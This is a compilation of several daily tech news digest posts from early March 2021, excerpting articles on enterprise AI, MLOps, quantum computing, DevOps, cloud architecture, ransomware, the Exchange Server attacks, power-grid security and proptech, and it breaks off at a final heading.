Daily Tech Digest - March 07, 2021

AI projects yield little business value so far

David Semach, a partner and head of AI and automation at Infosys Consulting for Europe, the Middle East and Africa (EMEA), agrees with the researchers that satisfaction with the technology in a financial sense is often quite low, partly because organisations “are mostly still experimenting” with it. This means it tends to be deployed in pockets rather than widely across the business. “The investment required in AI is significant, but if it’s just done in silos, you don’t gain economies of scale, you can’t take advantage of synergies and you don’t realise the cost benefits, which means it becomes a cost-prohibitive business model in many instances,” says Semach. Another key issue here is the fact that most companies “mistakenly” concentrate on using the software to boost the efficiency of internal processes and operating procedures, rather than for generating new revenue streams. “Where companies struggle is if they focus on process efficiencies and the bottom line because of the level of investment required,” says Semach. “But those that focus on leveraging AI to create new business and top-line growth are starting to see longer-term benefits.” 


How Optimizing MLOps can Revolutionize Enterprise AI

With database-deployment, it only takes one line of code to deploy a model. The database-deployment system automatically generates a table and trigger that embody the model execution environment. No more messing with containers. All a data scientist has to do is enter records of features into the system-generated predictions database table to do inference on these features. The system will automatically execute a trigger that runs the model on the new records. This saves time for future retraining too, since the prediction table holds all the new examples to add to the training set. This enables predictions to stay continuously up-to-date, easily--with little to no manual code. ... The other major bottleneck in the ML pipeline happens during the data transformation process: manually transforming data into features and serving those features to the ML model is time-intensive and monotonous work. A Feature Store is a shareable repository of features made to automate the input, tracking, and governance of data into machine learning models. Feature stores compute and store features, enabling them to be registered, discovered, used, and shared across a company.


How to get started in quantum computing

Unlike binary bits, qubits can exist as a ‘superposition’ of both 1 and 0, resolving one way or the other only when measured. Quantum computing also exploits properties such as entanglement, in which changing the state of one qubit also changes the state of another, even at a distance. Those properties empower quantum computers to solve certain classes of problem more quickly than classical computers. Chemists could, for instance, use quantum computers to speed up the identification of new catalysts through modelling. Yet that prospect remains a distant one. Even the fastest quantum computers today have no more than 100 qubits, and are plagued by random errors. In 2019, Google demonstrated that its 54-qubit quantum computer could solve in minutes a problem that would take a classical machine 10,000 years. But this ‘quantum advantage’ applied only to an extremely narrow situation. Peter Selinger, a mathematician and quantum-computing specialist at Dalhousie University in Halifax, Canada, estimates that computers will need several thousand qubits before they can usefully model chemical systems.


Non-Invasive Data Governance Q&A

Data Governance can be non-invasive if people are recognized into the role of data steward based on their existing relationship to the data. People define, produce and use data as part of their everyday jobs. People automatically are stewards if they are held formally accountable for how they define, produce and use data. The main premise of being non-invasive is that the organization is already governing data (in some form) and the issue is that they are doing it informally, leading to inefficiency and ineffectiveness in how the data is being governed. For example, people who use sensitive data are already expected to protect that data. The NIDG approach assure that these people know how data is classified, and that people follow the appropriate handling procedures for the entire data lifecycle. You are already governing but you can do it a lot better. We are not going to overwhelm you with new responsibilities that you should already have. ... The easiest answer to that question is that almost everybody looks at governance like they look at government. People think that data governance has to be difficult, complex and bureaucratic, when the truth is that it does NOT have to be that way. People are already governing and being governed within organizations, but it is being done informally. 


Apache Kafka in a Smart City Architecture

A smart city functions alongside various interfaces, data structures, and technologies. Many high-volume data streams must be integrated, correlated, and processed in real-time. Scalability and elastic infrastructure are essential for success. Many data streams contain mission-critical workloads and must offer reliability, zero data loss, and persistence. An event streaming platform based on the Apache Kafka ecosystem provides all these capabilities. ... A smart city requires more than real-time data integration and real-time messaging. Many use cases are only possible if the data is also processed continuously in real-time. That's where Kafka-native stream processing frameworks such as Kafka Streams and ksqlDB come into play. ... The public sector and smart city architectures leverage event streaming for various use cases. The reasons are the same as in all other industries: Kafka provides an open, scalable, elastic infrastructure. Additionally, it is battle-tested and runs in every infrastructure (edge, data center, cloud, bare metal, containers, Kubernetes, fully-managed SaaS such as Confluent Cloud). But event streaming is not the silver bullet for every problem. Therefore, Kafka complements other technologies such as MQTT for edge integration, or a cloud data lake for batch analytics.


Remote work: 4 ways to spot a toxic culture

Trust is the fundamental element of a high-performing culture. Especially in a remote workplace, it’s difficult to be a lone wolf and not collaborate on projects. If you notice that your team is avoiding working with someone, look to see if it’s a pattern. Perhaps that individual is “phoning it in” or making too many mistakes, and the team can’t trust their work anymore. You need to address this right away to avoid disappointing the rest of the team. Ask yourself: How much do folks enjoy redoing someone else’s work? Or watching the employee screw up and get away with it? Or questioning why they are working so hard while others aren’t? Worse, your team members may start wondering if they can trust you as a manager if you won’t handle the problem. ... When you hear someone make a statement that may be judgmental, ask the person, “What do you know to be true? What are the facts?” A good way to tell if someone is stating facts or judgments is to apply the “videotape test:” Can what they describe be captured by a video camera? For example, “He was late for the meeting” is a fact and passes the test. In contrast, “He’s lazy” is a judgment and doesn’t pass the test. Be mindful when you’re hearing judgments and try to dig out the facts.


Changing the AI Landscape Through Professionalization

Organizations should work with Data Architect, Business owners and Solution architect to develop their AI strategy underpinned by Data strategy, Data Taxonomy and analyzing the value that their company can and wish to create. For “Establishing a Data Driven culture is the key—and often the biggest challenge—to scaling artificial intelligence across your organization.” While your technology enables business, your workforce is the essential driving force. It is crucial to democratize data and AI literacy by encouraging skilling, upskilling, and reskilling. Resources in the organization would need to change their mindset from experience-based, leadership driven decision making to data-driven decision making, where employees augment their intuition and judgement with AI algorithms’ recommendations to arrive at best answers than either humans or machines could reach on their own. My recommendation would be to carve out “System of Knowledge & Learning” as a separate stream in overall Enterprise Architecture, along with System of Records, Systems of Engagement & Experiences, Systems of Innovation & Insight. AI and data literacy will help in increasing employee satisfaction because the organization is allowing its workforce to identify new areas for professional development.


How Skyworks embraced self-service IT

At Skyworks, the democratization of IT is all about giving our business users access to technology—application development, analytics, and automation—with the IT organization providing oversight, but not delivery. IT provides oversight in the form of security standards and release and change management strategies, which gives our business users both the freedom to improve their own productivity and the assurance that they are not reinventing the automation wheel across multiple sites. COVID has been a real catalyst of this new operating model. As in most companies, when COVID hit, we started to see a flurry of requests for new automation and better analytics in supply chain and demand management. Luckily for us, we had already started to put the foundation in place for our data organization, so we were able capitalize on this opportunity to move into self-service. ... For IT to shift from being order-takers to enablers of a self-service culture, we created a new role: the IT business partner. We have an IT business partner for every function; these people participate in all of the meetings of their dedicated function, and rather than asking “What new tool do you need?”, they ask, “What is the problem you are trying to solve?” IT used to sit at the execution table; with our new IT business partners, we now sit at the ideation table.


12 Service Level Agreement (SLA) best practices for IT leaders

Smart IT leaders understand that negotiation is not concession. It’s critical to reach a mutually agreed pathway to providing the service that the client expects, says Vamsi Alla, CTO at Think Power Solutions. In particular, IT leaders should work with providers on penalties and opt-out clauses. “A good SLA has provisions for mutually agreed-upon financial and non-financial penalties when service agreements are not met,” Alla says. Without that, an SLA is worth little more than the paper on which it’s written. ... “The most common mistake is to include performance metrics that are properly reviewed and unattainable,” Alla says. “This is usually done because the client has asked for it and the service provider is too willing to oblige. This may cause the contract to come through, but the road to execution becomes bumpy as the metrics can’t be achieved.” The level of service requested directly impacts the price of the service. “It’s important to understand what a reasonable level of performance is in the market so as not to over-spec expectations,” Fong of Everest Group says.


Security starts with architecture

Security must be viewed as an organizational value that exists in all aspects of its operation and in every part of the product development life cycle. That includes planning, design, development, testing and quality assurance, build management, release cycles, the delivery and deployment process, and ongoing maintenance. The new approach has to be both strategic and tactical. In strategic terms, every potential area of vulnerability has to be conceptually addressed through holistic architectural design. During the design process, tactical measures have to be implemented in each layer of the technology ecosystem (applications, data, infrastructure, data transfer, and information exchange). Ultimately, the responsibility will fall in the hands of the development and DevOps teams to build secure systems and fix security problems. The strategic and tactical approach outlined will allow them to handle security successfully. Security policies must be applied into the product development life cycle right where code is being written, data systems are being developed, and infrastructure is being set up.



Quote for the day:

"If you really want the key to success, start by doing the opposite of what everyone else is doing." -- Brad Szollose

Daily Tech Digest - March 06, 2021

From Agile to DevOps to DevSecOps: The Next Evolution

While Agile and DevOps share common goals, they have not always agreed on how to achieve those goals. DevOps differs in many respects from Agile, but, at its best, DevOps applies Agile methodologies, along with lean manufacturing principles, to speed up software deployment. One area of particular tension between Agile and DevOps is that the latter relies heavily on tools; in particular, when it comes to the automation of testing and deployment processes. But DevOps can overcome the resistance of Agile developers to tool usage simply by applying Agile principles themselves. Effectively, DevOps proponents must convince Agile teams that dogmatic adherence to the underlying principles of Agile is actually inconsistent with Agile in the first place. Ironically, Agile developers who insist that the process is always bad actually violate Agile principles by refusing to acknowledge the benefits offered through change, another Agile principle. The challenge is to have the Agile development teams trust in the automation efforts of DevOps, while at the same time encouraging the DevOps team to consider the business goals of deployment rather than pursuing speed of deployment for its own sake.


Geoff Hinton’s Latest Idea Has The Potential To Break New Ground In Computer Vision

According to Dr. Hinton, the obvious way to represent the part-whole hierarchy is by combining dynamically created graphs with neural network learning techniques. But, if the whole computer is a neural network, he explained, it is unclear how to represent part-whole hierarchies that are different for every image, if we want the structure of the neural net to be identical for all images. Capsule networks introduced by Dr.Hinton a couple of years ago offer a solution: A group of neurons, called a capsule, is set aside for each possible type of object or part in each region of the image. However, the problem with capsules is they use a mixture to model the set of possible parts. The computer will have a hard time answering questions like “Is the headlight different from the tyres and more such questions” (more on this example in the next section). The recent work on Neural Field offers a simple way to represent values of depth or intensity of the image. It uses a neural network that takes as input a code vector representing the image along with image location and outputs the predicted value at that location.


Addressing Security Throughout the Infrastructure DevOps Lifecycle

Keep in mind that developer-first security doesn’t preclude “traditional” cloud security methods — namely monitoring running cloud resources for security and compliance misconfigurations. First of all, unless you’ve achieved 100% parity between IaC and the cloud (unlikely), runtime scanning is essential for complete coverage. You probably still have teams or parts of your environment — maybe legacy resources — that are still being manually provisioned via legacy systems or directly in your console and so need to be continuously monitored. Even if you are mostly covered by IaC, humans make mistakes and SREmergencies are bound to happen. We recently wrote about the importance of cloud drift detection to catch manual changes that result in unintentional deltas between code configuration and running cloud resources. Insight into those resources in production is essential to determine those potentially risky gaps. Runtime scanning also has some advantages. Because it follows the actual states of configurations, it’s the only viable way of evaluating configuration changes over time when managing configuration in multiple methods. Relying solely on build-time findings without attributing them to actual configuration states in runtime could result in configuration clashes.


Privacy breaches in digital transactions: Examination under Competition Law or Data Protection Law?

As long as the search engines’ search data is kept secret, no rival or would be rival or entrant, will have access to this critical ‘raw material’ for search innovation. Further, when transactions take place in the digital economy, firms generally tend to collect personal as well as non-personal data of users in exchange for services provided. While it can be argued that personal data is probably collected with the user’s consent, usually, collection of non-personal data happens without the consent or knowledge of the consumers. Data is further compromised when businesses that have large amounts of data merge or amalgamate, and when dominant firms abuse their market position and resort to unethical practices. Traditional Competition Law analysis involves a wide focus on ‘pricing models’ i.e., methods used by business players to determine the price of their goods or services. User data forms part of the ‘non-pricing model’. With the Competition Act, 2002 undergoing a number of changes owing to technological developments, there is a possibility that non-pricing models are also considered under the ambit of the Act.


GraphQL: Making Sense of Enterprise Microservices for the UI

GraphQL has become an important tool for enterprises looking for a way to expose services via connected data graphs. These graph-oriented ways of thinking offer new advantages to partners and customers looking to consume data in a standardized way. Apart from the external consumption benefits, using GraphQL at Adobe has offered our UI engineering teams a way to grapple with the challenges related to the increasingly complicated world of distributed systems. Adobe Experience Platform itself offers dozens of microservices to its customers, and our engineering teams also rely on a fleet of internal microservices for things like secret management, authentication, and authorization. Breaking services into smaller components in a service-oriented architecture brings a lot of benefits to our teams. Some drawbacks need to be mitigated to deploy the advantages. More layers mean more complexity. More services mean more communication. GraphQL has been a key component for the Adobe Experience Platform user experience engineering team: one that allows us to embrace the advantages of SOA and helping us to navigate the complexities of microservice architecture.


Serverless Functions for Microservices? Probably Yes, but Stay Flexible to Change

When serverless functions are idle they cost nothing (“Pay per use” model). If a serverless function is called by 10 clients at the same time, 10 instances of it are spun up almost immediately (at least in most cases). The entire provision of infrastructure, its management, high availability (at least up to a certain level) and scaling (from 0 to the limits defined by the client) are provided out of the box by teams of specialists working behind the scenes. Serverless functions provide elasticity on steroids and allow you to focus on what is differentiating for your business. ... A “new service” needs to go out fast to the market, with the lowest possible upfront investment, and needs to be a “good service” since the start. When we want to launch a new service, a FaaS model is likely the best choice. Serverless functions can be set up fast and minimise the work for infrastructure. Their “pay per use” model means no upfront investment. Their scaling capabilities provide good consistent response time under different load conditions. If, after some time, the load becomes more stable and predictable, then the story can change, and a more traditional model based on dedicated resources, whether Kubernetes clusters or VMs, can become more convenient than FaaS.


Unconventional Sentiment Analysis: BERT vs. Catboost

Sentiment analysis is a Natural Language Processing (NLP) technique used to determine if data is positive, negative, or neutral. Sentiment analysis is fundamental, as it helps to understand the emotional tones within language. This, in turn, helps to automatically sort the opinions behind reviews, social media discussions, etc., allowing you to make faster, more accurate decisions. Although sentiment analysis has become extremely popular in recent times, work on it has been progressing since the early 2000s. Traditional machine learning methods such as Naive Bayesian, Logistic Regression, and Support Vector Machines (SVMs) are widely used for large-scale sentiment analysis because they scale well. Deep learning (DL) techniques have now been proven to provide better accuracy for various NLP tasks, including sentiment analysis; however, they tend to be slower and more expensive to learn and use. ... CatBoost is a high-performance, open-source library for gradient boosting on decision trees. From release 0.19.1, it supports text features for classification on GPU out-of-the-box. The main advantage is that CatBoost can include categorical functions and text functions in your data without additional preprocessing.


How to gain advanced cyber resilience and recovery across the IT ops and SecOps divide

The legacy IT world was all about protecting what they know about, and it’s hard to change. The new world is all about automation, right? It impacts everything we want to do and everything that we can do. Why wouldn’t we try to make our jobs as simple and easy as possible? When I first got into IT, one of my friends told me that the easiest thing you can do is script everything that you possibly can, just to make your life simpler. Nowadays, with the way digital workflows are going, it’s not just automating the simple things -- now we’re able to easily to automate the complex ones, too. We’re making it so anybody can jump in and get this automation going as quickly as possible. ... The security challenge has changed dramatically. What’s the impact of Internet of things (IoT) and edge computing? We’ve essentially created a much larger attack surface area, right? What’s changed in a very positive way is that this expanded surface has driven automation and the capability to not only secure workflows but to collaborate on those workflows. We have to have the capability to quickly detect, respond, and remediate.


Compute to data: using blockchain to decentralize data science and AI with the Ocean Protocol

If algorithms run where the data is, then this means how fast they will run depends on the resources available at the host. So the time needed to train algorithms that way may be longer compared to the centralized scenario, factoring in the overhead of communications and crypto. In a typical scenario, compute needs move from client side to data host side, said McConaghy: "Compute needs don't get higher or lower, they simply get moved. Ocean Compute-to-Data supports Kubernetes, which allows massive scale-up of compute if needed. There's no degradation of compute efficiency if it's on the host data side. There's a bonus: the bandwidth cost is lower, since only the final model has to be sent over the wire, rather than the whole dataset. There's another flow where Ocean Compute-to-Data is used to compute anonymized data. For example using Differential Privacy, or Decoupled Hashing. Then that anonymized data would be passed to the client side for model building there. In this case most of the compute is client-side, and bandwidth usage is higher because the (anonymized) dataset is sent over the wire. Ocean Compute-to-Data is flexible enough to accommodate all these scenarios".


Exchange Server Attacks Spread After Disclosure of Flaws

Beyond the U.S. federal government, the impact of the vulnerabilities continues to grow - and not just among the targeted sectors named by Microsoft. The company says those groups include infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and nongovernment organizations. Volexity, which contributed research for the vulnerability findings, first noticed exploitation activity against its customers around Jan. 6. That activity has suddenly ticked up now that the vulnerabilities are public, says Adair, CEO and founder of the firm. "The exploit already looks like it has spread to multiple Chinese APT groups who have become rather aggressive and noisy - quite a marked change from how it started with what we were seeing," he says. Threat detection company Huntress says it has seen compromises of unpatched Exchange servers in small hotels, one ice cream company, a kitchen appliance manufacturer and what it terms "multiple senior citizen communities." "We have also witnessed many city and county government victims, healthcare providers, banks/financial institutions and several residential electricity providers," writes John Hammond, a senior threat researcher at Huntress.



Quote for the day:

"Leadership development is a lifetime journey, not a quick trip." -- John Maxwell

Daily Tech Digest - March 05, 2021

Do Disaster Recovery Sites Actually Work?

Having the right resources available during a crisis is crucial. While internal IT teams perform disaster drills and claim they are able to run operation from the remote site, the fact is that new discoveries come to the fore when a disaster strikes and top management team is usually oblivious to these issues. These so-called drills are often just a farce put on for external and internal auditors, who seldom get to the core issues that may have occurred during the drill. Most auditor reports are checklists and they are happy to tick them off and present a rosy picture to the management. It is important to remember that NSE’s press release also said that it did not invoke the disaster recovery site based on management consultations. So what actually is a disaster recovery site? In layman terms it is an alternate site (which can be within the same city or another city) which is capable of running all the operations designed in a primary site. The genesis of a disaster recovery site is the business continuity policy (BCP). This document lists all IT systems that hold the data of an organisation, its dependencies with other systems, and all the elements which are necessary to run the system


We’ll never have true AI without first understanding the brain

The vast majority of AI researchers don’t really embrace the idea that the brain is important. I mean, yes, people figured out neural networks a while ago, and they’re kind of inspired by the brain. But most people aren’t trying to replicate the brain. It’s just whatever works, works. And today’s neural networks are working well enough. And most people in AI have very little understanding of neuroscience. It’s not surprising, because it’s really hard. It’s not something you just sit down and spend a couple of days reading about. Neuroscience itself has been struggling to understand what the hell’s going on in the brain. But one of the big goals of writing this book was to start a conversation about intelligence that we’re not having. I mean, my ideal dream is that every AI lab in the world reads this book and starts discussing these ideas. Do we accept them? Do we disagree? That hasn’t really been possible before. ... An AI that can detect cancer cells is great. But is that intelligence? No. In the book I use the example of robots on Mars building a habitat for humans. Try to imagine what kind of AI is required to do that. Is that possible? It’s totally possible.


Why paying off ransomware gangs is not a good idea

So what is the alternative? Insurers, especially in the US, urge their clients to quickly and quietly pay the ransom to minimise the damage of disruption. Then insurers allow the company to claim back the ransom payment on their insurance and raise their premiums for the following year. This payment is usually handled discreetly by a broker. In essence, the ransomware ecosystem functions like a protection racket, effectively supported by insurers who are set to pocket higher premiums as attacks continue. Aside from the moral objections we might have to routinely paying money to criminals, this practice causes two important practical problems. First, it encourages complacency in cybersecurity. This complacency was best exemplified when a hacked company paid a ransom, but never bothered to investigate how the hackers had breached their system. The company was promptly ransomed again, by the same group using the very same breach, just two weeks later. Second, some ransomware gangs invest their ill-gotten gains into the research and development of better cyber-tools. Many cybersecurity researchers are concerned about the increasing sophistication of the malware used by leading cybercrime groups such as REvil or Ryuk, which are both thought to be based in Russia.


Credential exposure trends: You need a better password

The data recovered by SpyCloud researchers includes more than 4.6 billion pieces of personally identifiable information (PII), including names, addresses, birthdates, job titles, social media URLs and nearly 1.3 billion phone numbers. Criminals use PII to create fake accounts or steal someone else’s identity and then apply for lines of credit, intercept tax refunds, drain bank accounts and more. With as little as one or two pieces of PII, they can compromise a person’s identity. Despite years of advice about the importance of strong passwords, people inevitably end up reusing or recycling the same credentials for multiple sites. Outdated password complexity requirements have complicated the issue by providing people with a false sense of security when they recycle a favorite password with a few simple changes, like capitalizing the first letter and adding a 1 or ! at the end. Industry standards call for organizations to convert plaintext passwords into hashes so if they are breached, criminals can’t easily access the passwords themselves. But some hashing algorithms are computationally harder to crack than others. Unfortunately, even the strongest hashing algorithm means little when users make weak or common password choices.


The office of the future is about people not places

Experts suggests the future of employment will be a hybrid mix of office- and home-working. As many as 90% of HR leaders believe employees will carry of working remotely in the post-COVID age, says tech analyst Gartner. That shift to hybrid working is something that resonates with Paul Coby, CIO at global science and chemicals company Johnson Matthey, whose guess is that people in the future will split their time between working from home and going into the office. What that means for many of us is that the traditional nine-to-five working day at the corporate HQ isn't coming back. "It seems to me that sitting in an office doing emails doesn't seem like a great use of offices or an individual's time," says Coby. Other experts agree. Researcher CCS Insights predicts more than half of all office-based employees will still work mainly remotely through 2022. IoD research, meanwhile, suggests more than half of business leaders plan on reducing their long-term use of workplaces, with more than one in five reporting use will be significantly lower. The office that many of us knew – with its command-and-control leadership styles – is probably gone forever. Get it right, and managers could change how we all work for the better. But quite how business leaders will organise and manage the hybrid workplace of the future is still very much up for debate right now.


Why global power grids are still vulnerable to cyber attacks

“Power grids are getting increasingly vulnerable because of digitalization and the use of more smart applications,” said Daine Loh, a Singapore-based power and renewables analyst at Fitch Solutions. It’s a threat highlighted in an initial probe in India that found an October blackout in Mumbai may have been caused by cyber sabotage. That outage impacted stock markets, trains and thousands of households in the nation’s financial hub. The disruptive potential of grid failures — as seen in Texas last month due to a sudden deep freeze — makes the sector a key target, particularly for state-based hostile actors. Over the past four decades, power plants and substations have been moving from manual to automatic controls, and are increasingly being connected to public and private networks for remote access, leaving them exposed to attacks. Producers and distributors have also often been reluctant to spend on protecting themselves against low-probability attacks. “India’s power system is in urgent need of proper cybersecurity systems,” said Reji Kumar Pillai, president of India Smart Grid Forum, a think-tank backed by the federal power ministry and which advises governments, regulators and utilities. 


Version 2 of Google’s Flutter toolkit adds support for desktop and web apps

Over the course of the last year or so, the team started working on what it calls Canvas Kit. This WebAssembly-based project takes the same Skia graphics engine that powers Android and Chrome itself and makes it available to web apps. “What that’s meant is that we can now essentially bypass the core HTML — sort of the document-centric parts of the web platform — and really use the app-centric parts of the web platform without leaving [behind] things like auto-complete of text or passwords and all the things that keep the web feeling very unique,” Sneath said. On the desktop, Google is announcing that Canonical is going all-in on Flutter and making it the default choice of all its future desktop and mobile apps. Microsoft, too, is expanding its support for Flutter and working with Google on Windows support for Flutter. Given Microsoft’s interest in Android, that’s maybe no huge surprise, and indeed, Microsoft today is releasing contributions to the Flutter engine to help support foldable Android devices. In total, Google notes, there are now over 15,000 packages for Flutter and Dart from companies like Amazon, Microsoft, Adobe, Huawei, Alibaba, eBay and Square.


Data Science Environments

Environment managers are critical to the concept of virtual machines. A virtual machine (VM) can be thought of as a computer inside of your computer (Inception style). As with everything mentioned here, a virtual machine is simply a method of file management. The VM is a program that isolates itself from all the other files on the computer; it may even run a different operating system. (For example, a MacOS computer might have a virtual machine running a Windows operating system.) Virtual machines are very effective when you want to recreate a programming environment on another computer, because you don’t need to know anything about that computer’s current dependencies. You can set up a virtual machine that has exactly the files visible to it that you have on your own computer’s virtual machine. For this reason, data science heavily utilizes virtual machines; they ensure reproducibility of results. Cloud-based applications are another common example of VMs. The developer counts on the fact that their VM will be isolated from any other code living on the server hosting their application.


8 mobile security threats you should take seriously

A mobile device is only as secure as the network through which it transmits data. In an era where we're all constantly connecting to networks that might not be optimally secured — be they improperly configured home networks, for remote workers, or public WiFi networks — our information frequently isn't as protected as we might assume. Just how significant of a concern is this? According to research by Wandera, in a more typical year, corporate mobile devices use WiFi almost three times as much as they use cellular data. Nearly a quarter of devices connect to open and potentially insecure WiFi networks, and 4% of devices encounter a man-in-the-middle attack — in which someone maliciously intercepts communication between two parties — within an average month. Those numbers have dipped this past year due to reduced travel and fewer physical businesses being open during COVID, but that doesn't mean the threat is gone — or that there's no need to remain ahead of the game, even with employees working mostly from home. "Rather than relying on man-in-the-middle attack detection to be reactive, we recommend organizations take a more proactive approach to securing remote connections," says Michael Covington


Risky business: 3 timeless approaches to reduce security risk in 2021

Some organizations see migrating to the cloud as a way of creating greenfield environments that can be secured more easily than the tech-debt-laden on-premises network. Yes, cloud adoption does have many security benefits. And, yes, the cloud does represent an opportunity to do things over better. With a greenfield architecture, with best practices baked neatly into it. Only, many organizations’ lack of cloud security processes and controls can quickly eat away at the cloud’s forecasted risk reduction benefits, reducing the overall value of this opportunity. You should keep in mind that AWS S3 buckets are left unsecured and publicly available all the time. Developers have been known to leave (or hardcode) private keys and tokens in the most embarrassing places. Personnel leave files unsecured and open to the public far too often. Publicly available endpoints are improperly segmented from private networks, sometimes creating an autobahn towards the on-premises network. Many organizations don’t do a good enough job of monitoring activity in the cloud or the information flow between the cloud and the on-premises network.



Quote for the day:

"It is easy to lead from the front when there are no obstacles before you, the true colors of a leader are exposed when placed under fire." -- Mark W. Boyer

Daily Tech Digest - March 04, 2021

Proptech disruption trends: innovation in the real estate space

Users have found that RPA can learn how to complete administrative tasks, leaving more time to spend on duties that require a more human touch, such as customer service. Tom Reiss, CEO of Roby AI, explained: “By learning how a user carries out a task, RPA can then be custom built and combined with tasks which require an element of human touch. This approach means that companies can become hugely efficient, and staff are no longer weighed down with laborious tasks. “Whilst some companies have traditionally feared proptech, this kind of clever technology can be implemented easily alongside existing structures. In turn, creating minimal disruption to the business and maximum output when it comes to efficiency, cost saving and employee satisfaction.” ... “Video surveillance can be performed in real time, or data can be collected and stored for the purpose of evaluation when required.” Lodhia went on to explain how the cloud has further facilitated safety measures, which have benefitted from remote monitoring and management, particularly during the Covid-19 pandemic. “The impact of cloud technology has had a dramatic impact on proptech, and there are two main benefits,” Lodhia said.


How the Digital Twin Drives Smart Manufacturing

One of the initial areas of focus for implementation of the digital twin has been asset lifecycle management (ALM). Maintaining assets in the field has traditionally been a time-consuming and costly task, but critical to equipment and system uptime. Today, maintenance technicians can leverage technologies like augmented reality (AR) that allows them to access virtual engineering models and overlay these models over the physical equipment on which they are performing maintenance using specialized AR goggles or glasses. This enables them to use the most accurate and up-to-date engineering, helping ensure that the correct maintenance and performance specifications are performed efficiently. These same maintenance methods, based on merging of virtual and physical environments, can be applied to factory production systems, machines, and work cells. In addition, products, production systems, machines, and work cells can be simulated virtually to test and validate physical systems prior to assembly and installation. Moreover, the virtual commissioning of production automation—an established technology and process—is merging with the more expansive scope of the digital twin.


What's between your clouds? That's key to multi-cloud performance

First, you need management and monitoring layers. These include AIOps, security managers, governance tooling, and other technologies that can manage and control heterogeneous cloud deployments. The management and monitoring layers are just as important—perhaps even more so—than are the native services that run on those public clouds. These layers of software systems become the jumping-off point for modern cloud operations, and they can operate without leveraging cloud-specific systems as you move forward. Second, public cloud providers are beginning to invest in cross-cloud solutions. Most won't mention the word multi-cloud, but they plan to support this architecture, nonetheless. This puts the nail in the coffin of less complex, single-cloud deployments that do not take advantage of best-of-breed. Some people remain skeptical that public cloud providers will build technology that will integrate with the competition, but the providers really have no other choice. Remember when Apple and Microsoft devices could not communicate? Cloud vendors do. This is not a new trend. Enterprises will continue to move to multi-cloud as the preferred cloud deployment platform, and that move is to the middle.


How We’ll Conduct Algorithmic Audits in the New Economy

Lack of transparent accountability for algorithm-driven decision making tends to raise alarms among impacted parties. Many of the most complex algorithms are authored by an ever-changing, seemingly anonymous cavalcade of programmers over many years. Algorithms’ seeming anonymity -- coupled with their daunting size, complexity and obscurity -- presents the human race with a seemingly intractable problem: How can public and private institutions in a democratic society establish procedures for effective oversight of algorithmic decisions? Much as complex bureaucracies tend to shield the instigators of unwise decisions, convoluted algorithms can obscure the specific factors that drove a specific piece of software to operate in a specific way under specific circumstances. In recent years, popular calls for auditing of enterprises’ algorithm-driven business processes has grown. Regulations such as the European Union (EU)’s General Data Protection Regulation may force your hand in this regard. GDPR prohibits any “automated individual decision-making” that “significantly affects” EU citizens. Specifically, GDPR restricts any algorithmic approach that factors a wide range of personal data -- including behavior, location, movements, health, interests, preferences, economic status, and so on—into automated decisions.


A quantum internet is closer to reality, thanks to this switch

For a quantum internet, forming connections between users and adjusting bandwidth means distributing entanglement, the ability of photons to maintain a fixed quantum mechanical relationship with one another no matter how far apart they may be to connect users in a network. Entanglement plays a key role in quantum computing and quantum information processing. "When people talk about a quantum internet, it's this idea of generating entanglement remotely between two different stations, such as between quantum computers," said Navin Lingaraju, a Purdue Ph.D. student in electrical and computer engineering. "Our method changes the rate at which entangled photons are shared between different users. These entangled photons might be used as a resource to entangle quantum computers or quantum sensors at the two different stations." Purdue researchers performed the study in collaboration with Joseph Lukens, a research scientist at Oak Ridge National Laboratory. The wavelength-selective switch that the team deployed is based on similar technology used for adjusting bandwidth for today's classical communication.


What is a solutions architect? A vital role for IT-business alignment

A solutions architect is responsible for evaluating an organization’s business needs and determining how IT can support those needs leveraging software, hardware, or infrastructure. Aligning IT strategy with business goals has become paramount, and a solutions architect can help determine, develop, and improve technical solutions in support of business goals. A solutions architect also bridges communication between IT and business operations to ensure everyone is aligned in developing and implementing technical solutions for business problems. The process requires regular feedback, adjustments, and problem-solving in order to properly design and implement potential solutions. Solution architecture itself encompasses business, system, information, security, application and technology architecture. Some examples of solutions architecture include developing cloud infrastructure for efficiency, implementing microservices for ecommerce, or adopting security measures for data, systems, and networks. While the scope of the job can vary depending on a business’ specific needs, there are certain responsibilities, skills, and qualifications that solutions architects will need to meet to get the job.


Digital transformation: 5 new realities for CIOs

We’re not just working from home but also attending school, shopping, and conducting all essential communications without ever walking out the front door. Many jobs that we previously thought were only doable from the job site can now be done remotely. Product development teams now have their living rooms and garages full of parts, equipment, etc., harkening back to the early start-up era for companies like Apple, HP, Microsoft, and others. Of course, the more we do from home, the more our finite bandwidth resources are taxed. Traditional peak hours for internet usage were in the evening, but with everyone home 24/7, streaming everything simultaneously, the Wi-Fi is straining to remain stable during an employee’s more ideal work hours. We must equip WFH employees with the technology and bandwidth they need to be productive and efficient. Allocate budget to upgrade employees’ home networks to premium bandwidth. Nothing causes more headaches than choppy bandwidth on Zoom when trying to support clients. ... With the move to the cloud and WFH, we’re now forced to manage a high-threat environment every time an employee fires up a laptop or mobile phone and taps into the company network or cloud resources.


AI in Hydroponics: The Future Of Smart Farming

AI-driven’ Smart Hydroponics’ can determine optimum growth for a plant through a combination of hardware setup and a software tool that can recreate its growth trajectory. Insights are generated from data obtained by sensors in the hardware. The sensing hardware is divided into three categories, each of which is strategically placed within the hydroponics farm. They sit near the plant roots and collect data about the crop vitals, pH levels, electrical conductivity levels, and nutrient supply. They also detect light density, temperature, and humidity levels. A visual camera also checks the growing plants for colouration and feeds the data to the AI software. On the other hand, insights about the precise nature and needs of the products are generated through machine learning. The AI software system works like the brain behind the entire Hydroponic farm. It can choose between different types of LED lighting and modulate light intensity. It can even turn on a suitable irrigation system. It drives end-to-end automation so that fewer manual tasks are delegated. Currently, AI in Hydroponics in India may be in a fledgeling state.


Fintech disruption trends: a changing payment landscape on the horizon

With such a dramatic drift shift to digital commerce, largely accelerated by the impact of Covid-19, demand for software-based payment technology will exponentially increase, according to Justin Pike, founder and chairman of MYPINPAD — the software-based payments company. In this digital world the consumer is opened up to a variety of choice that can’t be replicated in the physical world and competition is fierce. “Consequently, consumer facing brands have recognised the criticality of technology that can significantly improve the customer experience,” says Pike. He believes that software-based payment technology forms the missing piece of the puzzle in terms of innovating and improving the customer experience in a remote environment, where the customer experience is completed on mobile devices. “Standardisation of the payment experience through software, across all channels (both online and offline) is where we are rapidly heading. This innovation will bring a myriad of benefits for both consumer and brand, but it absolutely must be built on a foundation of security,” Pike continues. “For merchants, the opportunity to reach new markets and customers is too good to miss.


Arguing your way to better strategy

